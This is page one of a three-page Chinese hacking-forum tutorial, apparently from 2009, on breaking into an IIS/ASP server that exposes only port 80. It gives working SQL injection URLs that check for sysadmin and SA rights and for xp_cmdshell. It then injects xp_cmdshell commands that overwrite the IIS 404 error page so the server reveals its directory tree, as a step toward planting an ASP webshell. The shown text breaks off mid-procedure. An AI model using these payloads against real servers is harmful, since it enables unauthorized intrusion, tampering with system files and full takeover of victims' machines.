| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文 用户登录 新用户注册
[组图]全新方法突破80端口       ★★★ 【字体:
全新方法突破80端口
作者:不详 文章来源:华盟收集 点击数: 更新时间:2009-1-14

  作为专业的服务器,一般只打开80端口,这在追求安全的网络环境里已经不足为奇了,许多网络管理员也放松了警惕,以为这铜墙铁壁的系统真的无懈可击了。真得是如此吗?我们通过对某一类似服务器进行渗透打破这种观念。

  首先我们要对服务器进行信息收集,先拿出扫描工具对要测试的站点进行扫描,对方只提供WEB服务,开了80端口,其它信息一无所知,即使连对方的操作系统类型都不知道。这样的系统不知道装了N重防火墙或者IDS,直接从系统入侵根本不可能。我们还是从HTTP头探测我们所要的信息吧。对方的IIS版本号是IIS5.0,加上服务器上的ASP脚本,可大致判断对方是Windows 2000系统。知道这些信息对我们基于脚本下的入侵已经足够了。

  我们知道,一般网络管理员,只是负责对系统安全进行维护,至于脚本程序是由程序员编写的,他们大多数不会注意脚本的安全性,而且也不太可能什么都懂,从而使服务器有了SQL Injection的问题。很不幸,我也发现了一个:

  http://www.target.com/show.asp?id=1234'

  返回如图1所示。

 

  图1

  初步判断主机存在SQL注入漏洞,再次提交URL,确定服务器的连接权限:

  http://www.target.com/show.asp?id=1234 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))

  返回正常,表明当前连接的账号是服务器Sysadmin权限。试试SA权限,根据我的经验,这样重重防护的服务器除非没有脚本问题,一旦有,就很大可能是SA权限的连接:

  http://www.target.com/show.asp?id=1234 and 'sa'=(SELECT System_user)

  返回正常,表明我的猜测是对的,它是用SA连接的,权限比系统管理员还高,再看看我们最喜欢的Xp_cmdshell存在存在:

  http://www.target.com/show.asp?id=1234 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')

  返回正常,表明Xp_cmdshell扩展存储过程没有被删除。接下来就是最重要的工作了,虽然现在我们的权限级高,但由于对方防火墙的限制,我们除了80端口外无法和服务器进行通信,而且执行的CMD命令还没有回显。面对这种僵局,网上方法很多,基本上都是取得WEB的物理路径然,后Echo或Backup一个ASP木马到WEB目录下,得到WwbShell。其中简单的方法要属要饭兄的读注册表的方法了,但是他读取服务器WEB绝对路径一点,只有在默认安装的时候才会正确读取。也就是说注册表里面存储的只是在安装IIS时的WEB绝对路径,而如果用户对这个路径进行修改的话,注册表内的值仍然是不变的,因此即使你把木马按照臭要饭的那种方法上传上去也是没有办法找到并执行的。

  关于这个方法,大家可以在黑防前期杂志里看到,我就不再重复了。我现在要讲的是一个全新的方法来取得WEB的物理路径,大家要看好了啊。

  第一步我们要做的是在域名下随便输入一个不存在的页面,显然服务器会返回给我们404未找到的错误页面。如果管理员没有修改默认的错误页面,我们基本上就可以通过它来取得WebShell了。

  脚本小子:错误页面的默认位置是C:\winnt\help\iisHelp\common\目录,这是Windows 2000系统的默认路径,Windows 2003和Windows xp默认路径应该是C:\wondows\help\iisHelp\common\,其中404错误重定向到的文件是C:\winnt\help\iisHelp\common\404b.htm(windows2000),C:\windows\help\iisHelp\common\404b.htm(windowsXP),这里默认是将C盘作为系统盘得到的物理路径。

  好了,为了保险起见,我们先让服务器返回这个错误页面并将它保存起来,用来恢复修改后的服务器上的页面。好了,看好下面的提交:

  http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>c:\winnt\help\iisHelp\common\404b.htm';--

  等待一会儿,因为这个命令执行的很慢。我们随便访问一个不存在的页面,使服务器返回这个页面,如果没有变化,不要着急,在保证命令没有出错的前提下继续提交:

  http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>c:\wondows\help\iisHelp\common\404b.htm';--

  或

  http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>d:\winnt\help\iisHelp\common\404b.htm';--

  或

  http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>d:\wondows\help\iisHelp\common\404b.htm';--

[1] [2] [3] 下一页

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客: 没有了
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关黑客
    3389端口的新思路
    电脑端口的基础知识
    开80端口主机安全检测
    实现端口开放收集渗透
    电脑端口的基础知识
    各各端口抓鸡方法
    389端口引出经典资料
    BCB多线程端口扫描器
    SockOnline破端口限制
    手工查找木马四大招
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号